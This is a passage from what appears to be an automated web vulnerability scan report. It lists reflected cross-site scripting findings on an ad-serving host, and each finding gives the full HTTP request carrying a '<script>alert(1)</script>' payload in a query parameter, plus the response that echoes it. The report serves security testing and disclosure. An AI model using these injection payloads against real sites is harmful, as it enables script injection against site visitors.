5300325.14;abr=!ie;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4b92c7"><script>alert(1)</script>e45bffd3462&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh
...[SNIP]...

6.85. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ciu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ciu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ede4"><script>alert(1)</script>238e489c11a was submitted in the ciu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ2ede4"><script>alert(1)</script>238e489c11a&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:11 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 427
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ2ede4"><script>alert(1)</script>238e489c11a&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTY
...[SNIP]...

6.86. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ciu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ciu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d485"><script>alert(1)</script>e16a7c6290e was submitted in the ciu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=1d485"><script>alert(1)</script>e16a7c6290e&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:12 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 428
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 2232

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=1d485"><script>alert(1)</script>e16a7c6290e&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTY
...[SNIP]...

6.87. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ei parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a76f"><script>alert(1)</script>c1f5de777b5 was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK5a76f"><script>alert(1)</script>c1f5de777b5&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
pragma: no-cache
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:04 GMT
content-type: text/html
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Accept-Ranges: bytes
Age: 420
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Via: 1.1 mdw061008 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK5a76f"><script>alert(1)</script>c1f5de777b5&euid=Q0FFU0VPO
...[SNIP]...
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4860.158901.DATAXU/B5300325.14;abr=!ie;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK5a76f"><script>alert(1)</script>c1f5de777b5&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MF
...[SNIP]...

6.88. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ei parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e094"><script>alert(1)</script>a0646252eb1 was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=6e094"><script>alert(1)</script>a0646252eb1&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:05 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 421
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2218

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=6e094"><script>alert(1)</script>a0646252eb1&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MF
...[SNIP]...

6.89. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [euid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the euid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3008"><script>alert(1)</script>1337d721962 was submitted in the euid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=e3008"><script>alert(1)</script>1337d721962&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:08 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 424
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061006 (MII-APC/1.6)
Content-Length: 2188

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=e3008"><script>alert(1)</script>1337d721962&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.re
...[SNIP]...

6.90. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [euid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the euid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81612"><script>alert(1)</script>19610998b64 was submitted in the euid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn81612"><script>alert(1)</script>19610998b64&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:59:04 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 1264
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061006 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn81612"><script>a
...[SNIP]...
='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4860.158901.DATAXU/B5300325.14;abr=!ie;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn81612"><script>alert(1)</script>19610998b64&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.re
...[SNIP]...

6.91. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [fiu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the fiu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48222"><script>alert(1)</script>582d0f188f5 was submitted in the fiu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

